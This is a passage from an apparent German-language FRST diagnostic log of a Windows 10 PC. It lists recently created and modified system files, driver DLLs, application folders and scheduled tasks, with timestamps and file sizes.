2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-21 21:01 - 01992350 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-21 20:55 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten 2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-05-07 17:13 - 2017-05-21 20:55 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin 2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD 2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS 2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) 
C:\WINDOWS\SysWOW64\AsIO.dll 2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys 2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther 2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk 2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP 2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP 2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP 2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard 2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-05-21 21:23 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla 2017-05-21 21:01 - 2017-03-20 06:41 - 00877602 _____ C:\WINDOWS\system32\perfh007.dat 2017-05-21 21:01 - 2017-03-20 06:41 - 00184122 _____ C:\WINDOWS\system32\perfc007.dat 2017-05-21 20:56 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent 2017-05-21 20:56 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive 2017-05-21 20:55 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI 2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2017-05-21 20:55 - 2017-02-05 21:38 - 00014132 _____ C:\bdlog.txt 2017-05-21 20:55 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam 2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini 2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy 2017-05-21 12:27 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness 2017-05-20 14:33 - 
2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew 2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini 2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk 2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF 2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD 2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe 2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe 2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\system32\mantleaxl64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\SysWOW64\atigktxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\SysWOW64\amdmcl32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\SysWOW64\atimpc32.dll 2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache 2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed 2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages 2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat 2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12 2017-05-07 18:11 - 
2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning 2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism 2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI 2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll 2017-05-07 18:09 
- 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll 2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT 2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration 2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate 2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat 2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular 2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017 2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017 2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia 2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016 2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™ 2017-05-07 17:16 - 2015-08-22 
14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin 2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker 2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories 2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING 2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung 2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader 2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II 2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net 2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam 2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo 2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician 2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod 2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys 2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc 2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24 2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8 2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1 2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung 2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities 2017-05-07 17:14 
